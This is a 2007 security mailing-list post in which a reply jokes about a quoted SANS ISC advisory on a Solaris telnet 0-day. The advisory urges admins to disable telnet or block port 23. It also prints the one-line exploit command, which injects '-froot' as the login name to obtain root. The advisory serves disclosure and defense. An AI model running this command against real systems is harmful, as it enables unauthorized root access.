[Dshield] Solaris Telnet 0-day (Important!)

Gadi Evron ge at linuxbox.org
Mon Feb 12 04:42:54 GMT 2007


On Sun, 11 Feb 2007, Nicholas Albright wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Can anyone confirm if this will work locally as an elevation of
> privileges? -I know, just download and test for yourself...- Sun's site
> is exceeding slow with my download at the moment. :)

AHHH! so this 10 years old vulnerability is a PR stunt to get people to
download Solaris! :)

	Gadi.

> 
> regards,
> 
> Nicholas
> 
> 
> Johannes B. Ullrich wrote:
> > If you run Solaris, please check if you got telnet enabled NOW. If you
> > can, block port 23 at your perimeter. There is a fairly trivial Solaris
> > telnet 0-day.
> > 
> > telnet -l "-froot" [hostname]
> > 
> > will give you root on many Solaris systems with default installs
> > We are still testing. Please use our contact form at
> > https://isc.sans.org/contact.html
> > if you have any details about the use of this exploit.
> > 
> > 
> > 
> > 
> > 
> > ------------------------------------------------------------------------
> > 
> > _________________________________________
> > 
> > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > taught by our top rated instructors plus a huge vendor tools expo.
> > Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.3 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
> 
> iQIVAwUBRc/ux5SxqRV26ARGAQKmNw/+Ou+ITn//HzoLtYVLOmGp6tr9zjwCcmqS
> zxOQazoyJr0HhlylsdGCTmHLNAWCy1w0zwe+zhYhOzdZDzO3ORCrRKZ5rI1GVw91
> RKYurQkQrmAiK61oUA4P5ISLbMkYrZ9yxJ8C/lw2G/cRTmc3egY6XhJ8m07iZnan
> GqZklmKs5xpbolFWg0DfO1KinmKFWA5oLeewwxntqLIxUti0z/8poYxDA7pcIJIM
> 0NRvvxdAAn7L092LVuq59wkH+rnIHiDjZ1ifBkOluASaytKWQ8uNr+n1vLhDPR/l
> d5GNCsfUAtmcUqs0vEY+J3V8FBqM9/cDDqCj0g2w7DQvx8EjCtwVxwcveD2fxHOr
> BRXv3oHArkrOotVRcpiXrDV+C980I7d0721+EcTSlDc8vY4+BuRqcL+LSvtLzEzK
> DWhRf3O+uKPh8YRCKjuK9RNKRS/w8AvdH4gIH58+43MJFUVojfHmDyyxc8jdFDmA
> +8My4lU9BSEVvCYyi1SISgfnW2r5WpBGPgAuuf2tMTCf2ei8bCnhWQLM1qYlNrtc
> 1iKiqApmKt8VWWSwY7A9xBNlgtVdD/VzpQfH896DbftRxSS+UV/tkBOqVkQQDM8H
> dqBbVKsluUptdMDiJ0/H48AXe1gJUhOFJTKFcr1cdr7dWawPCwS4vXww88D6IMV6
> xjSHi5rGKcg=
> =dd9n
> -----END PGP SIGNATURE-----
> _________________________________________
> 
> SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> taught by our top rated instructors plus a huge vendor tools expo.
> Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
> 



More information about the list mailing list